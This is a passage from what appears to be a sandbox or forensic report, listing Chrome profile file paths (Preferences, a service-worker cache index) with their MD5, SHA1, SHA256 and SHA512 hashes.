| SHA512 | 2f4f5630a5bbd251e7dbf2deddac62b066ee70f92a84d97742df20a69a54889a845bcff1ab169358a76c095db396a4c28b02619114c36288cc31fc4017ce7f02 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2e7c6c9589fbe2926eba7b8dc486f264 |
| SHA1 | b6b867776b1f666c7177087d155880e61881c870 |
| SHA256 | d4b8a51cf6dddaf159df91a5d766a7bec4330344a50875cd5aa7fb3e15f6c0f4 |
| SHA512 | 83cc25b65beee220bab0bbe68ccc9a2c4c319ed17308a63040e04c5f1309ed0ee8066f8370bceef39bd3e055b49cf9c275f3259a84b6355e8297c28e7fc1ea72 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 3926c41b6159af82645dd70a69964187 |
| SHA1 | ef2814c13343b97b7e7d9bffc9d36604cef83108 |
| SHA256 | 6930353e9348c14b17d2f614336ac3fa5885d6d49fbb699bb36cea8c34e93c0c |
| SHA512 | 64fc5d3d008df60167958d67791f567780359a598bd6a1dab83d62874f3b48028edb76a509a2973053e85267e117c9bbe21a5a32f3829f5e9c9f1f3eb93c3bc8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 46caecc3aa456a09229de3f11fcff454 |
| SHA1 | 4dd4b1e8d41e8fb410ddc921b77e918c0e60f268 |
| SHA256 | 0a18d1a117783a6aa05cf21916797ed3981ffbeff36f5a60d77135d6baaa825f |
| SHA512 | 6f3a34d1f64da31316879db4e4ed7f5a3cd3832d4a85a341d7a842688a78ed86e29e0e7ad3be2a96ca58f30ac45a5134e1addb4954e0e702d5561d8d47573b8a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4e018e5535d39d656fa6940494d8caf9 |
| SHA1 | 64578e4d7968ad567c75cab91cd7e37a2c5d864f |
| SHA256 | 6ea951e3ca7f2bcb7d6d5a692c4a4e73ae2f74069d9c8f0c371cc7f15590a722 |
| SHA512 | ddf9eabd1c9bbb8bddc3df4eb226b003ef7c07bf1e5039609852a760e49892df49643241f64aaab19cb26a2c6af8aacac05d9826768e3c7e872bade872868bff |